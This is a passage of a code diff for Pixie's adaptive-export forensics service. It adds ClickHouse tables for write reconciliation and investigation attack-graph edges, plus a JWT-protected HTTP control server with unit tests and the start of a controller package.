+ watermark UInt64, -- source-table event_time in ns up to which rows have been drained
+ updated_at DateTime64(9, 'UTC') -- version column, the newest row per key survives a merge
+) ENGINE = ReplacingMergeTree(updated_at)
+ PARTITION BY hostname
+ ORDER BY (hostname, table_name);
+
+-- ============================================================================
+-- ae_reconcile — per-pull write-fidelity instrument (gated by ADAPTIVE_RECONCILE).
+--
+-- One row per data-plane pull: how many rows AE READ back from Pixie for a
+-- (table, pod, window) vs how many it WROTE to ClickHouse. Lets a reconcile
+-- run localize any loss to a single hop:
+-- read < px-direct PEM count → query/window/filter miss (R5)
+-- wrote < read → sink/batch drop (R6)
+-- CH distinct > read → re-pull duplication (C8)
+-- Plain MergeTree (append-only debug log). NOT a pixie observation table and
+-- NOT in PixieTables(); the operator creates it so a reconcile run has a
+-- target without manual DDL.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile (
+ ts DateTime64(9, 'UTC'),
+ mode String,
+ table_name String,
+ namespace String,
+ pod String,
+ win_start DateTime64(9, 'UTC'),
+ win_end DateTime64(9, 'UTC'),
+ read_count Int64, -- rows AE read back from Pixie for this pull
+ wrote_count Int64, -- rows AE wrote to ClickHouse for this pull
+ write_err String,
+ hostname String
+) ENGINE = MergeTree
+ PARTITION BY toYYYYMMDD(ts)
+ ORDER BY (table_name, ts)
+ -- append-only debug log; cap growth so long reconcile runs don't accumulate
+ -- unbounded storage (CodeRabbit). 30d matches the kubescape_logs and dx_attack_graph TTLs.
+ TTL toDateTime(ts) + INTERVAL 30 DAY DELETE;
+
+-- dx_attack_graph — dx evidence-graph edge list: one row per directed hop of an
+-- investigation (delivery/egress/execution/exfil/pivot), read by the Pixie
+-- dx_evidence_graph UI via px.DataFrame(clickhouse_dsn=...). Operator-owned
+-- (dx emits the edges, AE persists them); NOT a pixie socket_tracer table.
+--
+-- event_time (unix NANOSECONDS) + hostname are REQUIRED: Pixie's clickhouse_dsn
+-- query template hardcodes `WHERE event_time >= ... AND hostname = ... ORDER BY
+-- event_time` — a table without those columns fails with "Unknown identifier
+-- event_time". Same convention as kubescape_logs. event_time is nanos, so the
+-- partition/TTL use fromUnixTimestamp64Nano (toDateTime would read ns as seconds
+-- → year ~58e9 → broken partitions; see the soc#225 fix).
+CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph (
+ investigation_id String,
+ event_time UInt64, -- unix nanoseconds
+ hostname String,
+ requestor_pod String,
+ responder_pod String,
+ requestor_service String,
+ responder_service String,
+ requestor_ip String,
+ responder_ip String,
+ -- Int64/Float64 ONLY for the numeric columns: Pixie's clickhouse_dsn type
+ -- mapper reads UInt8 as BOOLEAN and does not handle UInt16/UInt32/Float32,
+ -- so those fail px marshaling with "Column[N] given incorrect type". Int64
+ -- + Float64 map cleanly (INT64→Int64, FLOAT64→Float64). event_time stays
+ -- UInt64 (same as kubescape_logs, which px reads fine).
+ weight Int64,
+ max_severity Int64,
+ confidence Float64,
+ edge_kind String,
+ `condition` String, -- empty for benign edges, the dx_attack_graph_malicious view keeps only non-empty values
+ criteria String,
+ num_findings Int64
+) ENGINE = MergeTree()
+ ORDER BY (event_time, hostname)
+ PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time))
+ TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE
+ SETTINGS index_granularity = 8192;
+
+-- dx_attack_graph_malicious — rule-ins-only view (condition != ''): the dx_evidence_graph
+-- UI reads it by default; benign rows stay in the base table dx_attack_graph.
+CREATE VIEW IF NOT EXISTS forensic_db.dx_attack_graph_malicious AS
+ SELECT * FROM forensic_db.dx_attack_graph WHERE `condition` != '';
diff --git a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
index 4d19f27afab..393e71fe298 100644
--- a/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/internal/config/BUILD.bazel
@@ -18,17 +18,12 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library")
go_library(
name = "config",
- srcs = [
- "config.go",
- "definition.go",
- ],
+ srcs = ["config.go"],
importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/config",
visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
deps = [
"//src/utils/shared/k8s",
- "//src/vizier/services/adaptive_export/internal/script",
"@com_github_sirupsen_logrus//:logrus",
- "@in_gopkg_yaml_v2//:yaml_v2",
"@io_k8s_apimachinery//pkg/apis/meta/v1:meta",
"@io_k8s_client_go//kubernetes",
"@io_k8s_client_go//rest",
diff --git a/src/vizier/services/adaptive_export/internal/config/definition.go b/src/vizier/services/adaptive_export/internal/config/definition.go
deleted file mode 100644
index 2f663ac9422..00000000000
--- a/src/vizier/services/adaptive_export/internal/config/definition.go
+++ /dev/null
@@ -1,65 +0,0 @@
-// Copyright 2018- The Pixie Authors.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-// SPDX-License-Identifier: Apache-2.0
-
-package config
-
-import (
- "os"
- "path/filepath"
- "strings"
-
- "gopkg.in/yaml.v2"
-
- "px.dev/pixie/src/vizier/services/adaptive_export/internal/script"
-)
-
-const scriptExtension = ".yaml"
-
-// ReadScriptDefinitions reads the script definition from the given directory path.
-// Only .yaml files are read and subdirectories are not traversed.
-func ReadScriptDefinitions(dir string) ([]*script.ScriptDefinition, error) {
- if _, err := os.Stat(dir); os.IsNotExist(err) {
- return nil, nil
- }
- files, err := os.ReadDir(dir)
- if err != nil {
- return nil, err
- }
- var l []*script.ScriptDefinition
- for _, file := range files {
- if strings.HasSuffix(file.Name(), scriptExtension) {
- description, err := readScriptDefinition(filepath.Join(dir, file.Name()))
- if err != nil {
- return nil, err
- }
- l = append(l, description)
- }
- }
- return l, nil
-}
-
-func readScriptDefinition(path string) (*script.ScriptDefinition, error) {
- content, err := os.ReadFile(path)
- if err != nil {
- return nil, err
- }
- var definition script.ScriptDefinition
- err = yaml.Unmarshal(content, &definition)
- if err != nil {
- return nil, err
- }
- return &definition, nil
-}
diff --git a/src/vizier/services/adaptive_export/internal/control/BUILD.bazel b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel
new file mode 100644
index 00000000000..c22b1b8ba71
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/control/BUILD.bazel
@@ -0,0 +1,41 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "control",
+ srcs = ["server.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/control",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/shared/services/utils",
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
+
+pl_go_test(
+ name = "control_test",
+ srcs = ["server_test.go"],
+ embed = [":control"],
+ deps = [
+ "//src/shared/services/utils",
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/control/server.go b/src/vizier/services/adaptive_export/internal/control/server.go
new file mode 100644
index 00000000000..05837596d6a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/control/server.go
@@ -0,0 +1,237 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package control is the external control surface. It lets the controller
+// (the diagnostician) steer this AE (the hands): start/stop exporting a
+// target, and order a specific (table, window) query. AE's existing
+// kubescape-trigger → controller → activeSet flow is untouched; this is an
+// additional, env-gated driver of the same activeSet. Off unless
+// CONTROL_ADDR is set.
+//
+// The handlers depend on narrow interfaces (exporter, queryRunner) — not on
+// the concrete Controller — so the package is unit-testable with fakes and so
+// the blast radius on AE is a single wiring line in main.go.
+package control
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "net/http"
+ "strings"
+ "time"
+
+ jwtutils "px.dev/pixie/src/shared/services/utils"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// exporter is the slice of *activeset.ActiveSet this package needs: /export/start
+// calls Upsert, /export/stop calls Remove, and AE's streaming/controller acts on the deltas.
+type exporter interface {
+	Upsert(k activeset.Key, tEnd time.Time)
+	Remove(k activeset.Key)
+}
+
+// queryRunner executes one controller-ordered (table, target, window) query and
+// writes the result through AE's normal sink. The query_id is carried so exported rows
+// can be flagged provisional→confirmed/benign_retire (audit). An error makes /query reply 502.
+type queryRunner interface {
+	OrderQuery(target anomaly.Target, table string, start, end time.Time, queryID string) error
+}
+
+// graphWriter persists dx evidence-graph edges (newline-delimited JSON, JSONEachRow) to
+// forensic_db.dx_attack_graph. nil → /dx/attack_graph 501s; a returned error → 502.
+type graphWriter interface {
+	WriteAttackGraph(ctx context.Context, jsonEachRow []byte) error
+}
+
+// Server is the control HTTP surface.
+type Server struct {
+	set    exporter                  // active-set driver behind /export/start and /export/stop
+	runner queryRunner               // may be nil; /query then returns 501
+	graph  graphWriter               // may be nil; /dx/attack_graph then returns 501
+	mux    *http.ServeMux            // route table, populated once in New
+	verify func(bearer string) error // nil → auth disabled; set via SetAuth
+}
+
+// New assembles the control server and registers every route on a fresh mux.
+// A nil runner is allowed when only start/stop is needed; /query then answers 501.
+func New(set exporter, runner queryRunner) *Server {
+	srv := &Server{set: set, runner: runner, mux: http.NewServeMux()}
+	srv.mux.HandleFunc("/healthz", srv.handleHealth)
+	srv.mux.HandleFunc("/export/start", srv.handleStart)
+	srv.mux.HandleFunc("/export/stop", srv.handleStop)
+	srv.mux.HandleFunc("/query", srv.handleQuery)
+	srv.mux.HandleFunc("/dx/attack_graph", srv.handleDXAttackGraph)
+	return srv
+}
+
+// SetGraphWriter wires the dx_attack_graph sink; until it is called /dx/attack_graph answers 501.
+func (s *Server) SetGraphWriter(g graphWriter) { s.graph = g }
+
+// SetAuth enables bearer-JWT auth on the control surface. Tokens are checked by
+// jwtutils.ParseToken (px.dev/pixie/src/shared/services/utils) against signingKey
+// and audience — the same shared lib + signing key the vizier broker/PEM use, so dx
+// can attach the service JWT it already mints (GenerateJWTForService,
+// PL_JWT_SIGNING_KEY). No new secret/crypto. /healthz stays open for k8s probes.
+func (s *Server) SetAuth(signingKey, audience string) {
+	check := func(token string) error {
+		_, err := jwtutils.ParseToken(token, signingKey, audience)
+		return err
+	}
+	s.verify = check
+}
+
+// Handler exposes the mux (for httptest + main.go wiring), wrapped in the auth
+// middleware when SetAuth was called.
+func (s *Server) Handler() http.Handler {
+ if s.verify == nil {
+ return s.mux
+ }
+ return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ if r.URL.Path != "/healthz" { // probes stay unauthenticated
+ const p = "Bearer "
+ h := r.Header.Get("Authorization")
+ if !strings.HasPrefix(h, p) || s.verify(strings.TrimPrefix(h, p)) != nil {
+ w.WriteHeader(http.StatusUnauthorized)
+ return
+ }
+ }
+ s.mux.ServeHTTP(w, r)
+ })
+}
+
+// handleDXAttackGraph accepts a POSTed JSON array of dx evidence-graph edges and
+// forwards them to the graph writer as newline-delimited JSON (JSONEachRow) for
+// forensic_db.dx_attack_graph. Replies: 405 non-POST, 501 no writer wired, 400
+// undecodable body, 502 writer error, 202 otherwise (including an empty array).
+func (s *Server) handleDXAttackGraph(w http.ResponseWriter, r *http.Request) {
+	var rows []json.RawMessage
+	switch { // cases run top to bottom, so the body is only decoded once the cheaper checks pass
+	case r.Method != http.MethodPost:
+		w.WriteHeader(http.StatusMethodNotAllowed)
+		return
+	case s.graph == nil:
+		w.WriteHeader(http.StatusNotImplemented)
+		return
+	case !decode(r, &rows):
+		w.WriteHeader(http.StatusBadRequest)
+		return
+	case len(rows) == 0: // nothing to write
+		w.WriteHeader(http.StatusAccepted)
+		return
+	}
+	var ndjson bytes.Buffer
+	for _, row := range rows {
+		ndjson.Write(row) // each element is copied verbatim
+		ndjson.WriteByte('\n')
+	}
+	status := http.StatusAccepted
+	if err := s.graph.WriteAttackGraph(r.Context(), ndjson.Bytes()); err != nil {
+		status = http.StatusBadGateway
+	}
+	w.WriteHeader(status)
+}
+
+// ── wire types ────────────────────────────────────────────────────────
+type targetReq struct {
+	Namespace string `json:"namespace"` // with Pod, forms the activeset.Key
+	Pod       string `json:"pod"`       // every handler rejects an empty pod with 400
+	Comm      string `json:"comm"`      // only carried into anomaly.Target (used by /query)
+}
+
+type startReq struct {
+	targetReq
+	TEnd int64 `json:"t_end"` // unix seconds; handleStart rejects values <= 0
+}
+
+type queryReq struct {
+	targetReq
+	Table   string   `json:"table"`    // required (empty → 400)
+	Window  [2]int64 `json:"window"`   // [start,end] unix seconds; both > 0 and start < end
+	QueryID string   `json:"query_id"` // required; passed through to OrderQuery
+}
+
+func (t targetReq) key() activeset.Key { // active-set identity is namespace + pod; Comm is not part of it
+	return activeset.Key{Namespace: t.Namespace, Pod: t.Pod}
+}
+
+func (t targetReq) target() anomaly.Target { // full target (comm + pod + namespace) handed to OrderQuery
+	return anomaly.Target{Comm: t.Comm, Pod: t.Pod, Namespace: t.Namespace}
+}
+
+func decode(r *http.Request, v any) bool { // false on malformed JSON or a body over 16 MiB (cap added: the body is untrusted)
+	defer r.Body.Close()
+	return json.NewDecoder(http.MaxBytesReader(nil, r.Body, 16<<20)).Decode(v) == nil // nil writer: only the read limit is wanted
+}
+
+// ── handlers ──────────────────────────────────────────────────────────
+func (s *Server) handleHealth(w http.ResponseWriter, _ *http.Request) { // probe endpoint: any method gets a bare 200
+	w.WriteHeader(http.StatusOK)
+}
+
+// handleStart (POST /export/start) upserts namespace/pod into the active set until t_end.
+func (s *Server) handleStart(w http.ResponseWriter, r *http.Request) {
+	var body startReq
+	switch {
+	case r.Method != http.MethodPost:
+		w.WriteHeader(http.StatusMethodNotAllowed)
+	case !decode(r, &body) || body.Pod == "" || body.TEnd <= 0:
+		w.WriteHeader(http.StatusBadRequest)
+	default:
+		s.set.Upsert(body.key(), time.Unix(body.TEnd, 0))
+		w.WriteHeader(http.StatusAccepted)
+	}
+}
+
+// handleStop (POST /export/stop) removes namespace/pod from the active set.
+func (s *Server) handleStop(w http.ResponseWriter, r *http.Request) {
+	var body targetReq
+	switch {
+	case r.Method != http.MethodPost:
+		w.WriteHeader(http.StatusMethodNotAllowed)
+	case !decode(r, &body) || body.Pod == "":
+		w.WriteHeader(http.StatusBadRequest)
+	default:
+		s.set.Remove(body.key())
+		w.WriteHeader(http.StatusAccepted)
+	}
+}
+
+// handleQuery (POST /query) runs one controller-ordered (table, window) query for a target.
+// Replies: 405 non-POST, 501 no runner wired, 400 invalid request, 502 runner error, else 202.
+func (s *Server) handleQuery(w http.ResponseWriter, r *http.Request) {
+	var q queryReq
+	switch {
+	case r.Method != http.MethodPost:
+		w.WriteHeader(http.StatusMethodNotAllowed)
+		return
+	case s.runner == nil:
+		w.WriteHeader(http.StatusNotImplemented)
+		return
+	case !decode(r, &q) || q.Pod == "" || q.Table == "" || q.QueryID == "" ||
+		q.Window[0] <= 0 || q.Window[1] <= 0 || q.Window[0] >= q.Window[1]:
+		w.WriteHeader(http.StatusBadRequest)
+		return
+	}
+	from, to := time.Unix(q.Window[0], 0), time.Unix(q.Window[1], 0)
+	status := http.StatusAccepted
+	if err := s.runner.OrderQuery(q.target(), q.Table, from, to, q.QueryID); err != nil {
+		status = http.StatusBadGateway
+	}
+	w.WriteHeader(status)
+}
diff --git a/src/vizier/services/adaptive_export/internal/control/server_test.go b/src/vizier/services/adaptive_export/internal/control/server_test.go
new file mode 100644
index 00000000000..429cdf8a472
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/control/server_test.go
@@ -0,0 +1,199 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package control
+
+import (
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "testing"
+ "time"
+
+ jwtutils "px.dev/pixie/src/shared/services/utils"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// fakeExporter is a test double for exporter (the controller → activeSet contract):
+// it logs every key handed to Upsert/Remove and remembers the most recent tEnd.
+type fakeExporter struct {
+	upserts []activeset.Key
+	removes []activeset.Key
+	lastEnd time.Time
+}
+
+func (f *fakeExporter) Upsert(k activeset.Key, tEnd time.Time) {
+	f.upserts, f.lastEnd = append(f.upserts, k), tEnd
+}
+func (f *fakeExporter) Remove(k activeset.Key) { f.removes = append(f.removes, k) }
+
+// fakeRunner logs each OrderQuery call and returns err, which drives the failure path.
+type fakeRunner struct {
+	calls []string // "table|ns/pod|queryID"
+	err   error
+}
+
+func (f *fakeRunner) OrderQuery(t anomaly.Target, table string, start, end time.Time, qid string) error {
+	f.calls = append(f.calls, strings.Join([]string{table, t.Namespace + "/" + t.Pod, qid}, "|"))
+	return f.err
+}
+
+// do sends one in-memory request through srv.Handler() and returns the recorded response.
+func do(t *testing.T, srv *Server, method, path, body string) *http.Response {
+	t.Helper()
+	rec := httptest.NewRecorder()
+	srv.Handler().ServeHTTP(rec, httptest.NewRequest(method, path, strings.NewReader(body)))
+	return rec.Result()
+}
+
+// TestControlAuth: once SetAuth is on, every endpoint except /healthz demands a
+// valid bearer JWT minted by the shared lib (the same one dx uses); a missing or
+// malformed token yields 401, and a valid one must not.
+func TestControlAuth(t *testing.T) {
+	const key = "0123456789abcdef0123456789abcdef" // HS256 test key
+	srv := New(&fakeExporter{}, nil)
+	srv.SetAuth(key, "vizier")
+	h := srv.Handler()
+
+	good, err := jwtutils.SignJWTClaims(jwtutils.GenerateJWTForService("dx", "vizier"), key)
+	if err != nil {
+		t.Fatalf("mint token: %v", err)
+	}
+	// post fires a start request with the given Authorization value ("" → header omitted).
+	post := func(path, auth string) int {
+		req := httptest.NewRequest(http.MethodPost, path, strings.NewReader(`{"pod":"p","t_end":1}`))
+		if auth != "" {
+			req.Header.Set("Authorization", auth)
+		}
+		rec := httptest.NewRecorder()
+		h.ServeHTTP(rec, req)
+		return rec.Result().StatusCode
+	}
+	for _, tc := range [][2]string{{"no bearer", ""}, {"bad bearer", "Bearer not-a-jwt"}} {
+		if got := post("/export/start", tc[1]); got != http.StatusUnauthorized {
+			t.Fatalf("%s: want 401, got %d", tc[0], got)
+		}
+	}
+	if post("/export/start", "Bearer "+good) == http.StatusUnauthorized {
+		t.Fatalf("valid bearer wrongly rejected (401)")
+	}
+	probe := httptest.NewRecorder() // probes stay open
+	h.ServeHTTP(probe, httptest.NewRequest(http.MethodGet, "/healthz", nil))
+	if probe.Result().StatusCode == http.StatusUnauthorized {
+		t.Fatal("/healthz must not require auth")
+	}
+}
+
+// TestStartExportUpserts: a valid start request upserts exactly one key with the requested t_end.
+func TestStartExportUpserts(t *testing.T) {
+	fake := &fakeExporter{}
+	res := do(t, New(fake, nil), http.MethodPost, "/export/start",
+		`{"namespace":"log4j-poc","pod":"chain-backend-abc","comm":"sh","t_end":1717200600}`)
+	if res.StatusCode != http.StatusAccepted {
+		t.Fatalf("status = %d, want 202", res.StatusCode)
+	}
+	if len(fake.upserts) != 1 || fake.upserts[0].Pod != "chain-backend-abc" ||
+		fake.upserts[0].Namespace != "log4j-poc" {
+		t.Fatalf("upsert = %+v, want one for log4j-poc/chain-backend-abc", fake.upserts)
+	}
+	if want := time.Unix(1717200600, 0); fake.lastEnd != want {
+		t.Fatalf("tEnd = %v, want 1717200600", fake.lastEnd)
+	}
+}
+
+// TestStopExportRemoves: a valid stop request removes exactly that pod's key.
+func TestStopExportRemoves(t *testing.T) {
+	fake := &fakeExporter{}
+	res := do(t, New(fake, nil), http.MethodPost, "/export/stop",
+		`{"namespace":"log4j-poc","pod":"chain-backend-abc"}`)
+	if res.StatusCode != http.StatusAccepted {
+		t.Fatalf("status = %d, want 202", res.StatusCode)
+	}
+	if len(fake.removes) != 1 || fake.removes[0].Pod != "chain-backend-abc" {
+		t.Fatalf("remove = %+v, want one for chain-backend-abc", fake.removes)
+	}
+}
+
+func TestOrderQueryRunsAndCarriesID(t *testing.T) {
+ ex := &fakeExporter{}
+ rn := &fakeRunner{}
+ srv := New(ex, rn)
+ resp := do(t, srv, http.MethodPost, "/query",
+ `{"namespace":"log4j-poc","pod":"p","comm":"sh","table":"conn_stats","window":[100,200],"query_id":"log4j-poc:p:conn_stats:100-200"}`)
+ if resp.StatusCode != http.StatusAccepted {
+ t.Fatalf("status = %d, want 202", resp.StatusCode)
+ }
+ if len(rn.calls) != 1 || rn.calls[0] != "conn_stats|log4j-poc/p|log4j-poc:p:conn_stats:100-200" {
+ t.Fatalf("calls = %v", rn.calls)
+ }
+}
+
+// TestQueryWithoutRunnerIs501: with a nil runner, even a well-formed /query gets 501.
+func TestQueryWithoutRunnerIs501(t *testing.T) {
+	res := do(t, New(&fakeExporter{}, nil), http.MethodPost, "/query", // no runner wired
+		`{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`)
+	if res.StatusCode != http.StatusNotImplemented {
+		t.Fatalf("status = %d, want 501", res.StatusCode)
+	}
+}
+
+func TestBadInputRejected(t *testing.T) {
+	srv := New(&fakeExporter{}, &fakeRunner{})
+	for _, tc := range []struct{ label, path, body string }{
+		// missing pod
+		{"start no-pod", "/export/start", `{"namespace":"n"}`},
+		// malformed json
+		{"stop bad-json", "/export/stop", `{not json`},
+		// query missing table
+		{"query no-table", "/query", `{"pod":"p","query_id":"x","window":[1,2]}`},
+	} {
+		if r := do(t, srv, http.MethodPost, tc.path, tc.body); r.StatusCode != http.StatusBadRequest {
+			t.Fatalf("%s = %d, want 400", tc.label, r.StatusCode)
+		}
+	}
+}
+
+func TestWrongMethodRejected(t *testing.T) {
+	res := do(t, New(&fakeExporter{}, &fakeRunner{}), http.MethodGet, "/export/start", ``)
+	if res.StatusCode != http.StatusMethodNotAllowed {
+		t.Fatalf("GET start = %d, want 405", res.StatusCode)
+	}
+}
+
+// TestRunnerErrorIsBadGateway: an OrderQuery error surfaces to the caller as 502.
+func TestRunnerErrorIsBadGateway(t *testing.T) {
+	srv := New(&fakeExporter{}, &fakeRunner{err: errFake})
+	res := do(t, srv, http.MethodPost, "/query",
+		`{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`)
+	if res.StatusCode != http.StatusBadGateway {
+		t.Fatalf("runner-error = %d, want 502", res.StatusCode)
+	}
+}
+
+func TestHealthz(t *testing.T) {
+	res := do(t, New(&fakeExporter{}, nil), http.MethodGet, "/healthz", ``)
+	if res.StatusCode != http.StatusOK {
+		t.Fatalf("healthz = %d, want 200", res.StatusCode)
+	}
+}
+
+type fakeErr struct{} // minimal error implementation for forcing the runner failure path
+
+func (fakeErr) Error() string { return "boom" }
+
+var errFake = fakeErr{} // injected through fakeRunner.err in TestRunnerErrorIsBadGateway
diff --git a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel
new file mode 100644
index 00000000000..5e19fbeaf1e
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel
@@ -0,0 +1,44 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "controller",
+ srcs = ["controller.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "//src/vizier/services/adaptive_export/internal/pxl",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "controller_test",
+ srcs = ["controller_test.go"],
+ embed = [":controller"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/controller/controller.go b/src/vizier/services/adaptive_export/internal/controller/controller.go
new file mode 100644
index 00000000000..601c3a27b30
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/controller/controller.go
@@ -0,0 +1,760 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package controller orchestrates the adaptive-write push flow on a
+// single node:
+//
+// 1. Subscribe to a Trigger that produces kubescape.Event values.
+// 2. For each event, derive the workload anomaly.Target + AnomalyHash,
+// look up the in-memory active set for this hostname, and either
+// open a new active row or extend an existing one (t_end ← now+after).
+// 3. Persist the resulting AttributionRow to ClickHouse via Sink.
+//
+// By default the controller does NOT execute PxL itself, does NOT write pixie observation
+// rows, and does NOT manage retention scripts; Pixie's retention plugin (driven by user-defined
+// PxL scripts in the UI) owns those, and the only output is forensic_db.adaptive_attribution.
+// Exception: the opt-in rev-1 path (WithPixieQuerier + Config.PushPixieTables) queries pixie and pushes rows itself.
+package controller
+
+import (
+ "context"
+ "sync"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// Trigger is the source of new kubescape events; Run subscribes once and drains the returned channel.
+type Trigger interface {
+	Subscribe(ctx context.Context) (<-chan kubescape.Event, error)
+}
+
+// Sink is the ClickHouse-facing dependency. Write persists attribution rows;
+// QueryActive fetches the still-active rows for a hostname so Rehydrate can
+// restore state after a crash; WritePixieRows is the rev-1 fallback for
+// environments where the cloud's retention plugin can't reach the in-cluster
+// CH (so the operator queries pixie itself and pushes rows directly).
+type Sink interface {
+	Write(ctx context.Context, rows []sink.AttributionRow) error
+	QueryActive(ctx context.Context, hostname string) ([]sink.AttributionRow, error)
+	WritePixieRows(ctx context.Context, table string, rows []map[string]any) error
+}
+
+// PixieQuerier is the rev-1 path's executor: it takes a PxL string and
+// returns the resulting rows. A nil querier disables operator-side pixie
+// pushes (rev-2 default — the cloud's plugin handles it).
+type PixieQuerier interface {
+	Query(ctx context.Context, pxl string) ([]map[string]any, error)
+}
+
+// Clock abstracts the time source so tests can substitute their own.
+type Clock interface {
+	Now() time.Time
+}
+
+// RealClock is the production Clock; New falls back to it when given a nil Clock.
+type RealClock struct{}
+
+// Now returns time.Now().
+func (RealClock) Now() time.Time { return time.Now() }
+
+// Config tunes the controller. Zero values fall through to safe defaults.
+type Config struct {
+	// Hostname is the node-local key. REQUIRED.
+	Hostname string
+
+	// Rec records per-pull read/wrote counts for the FILTER fan-out path
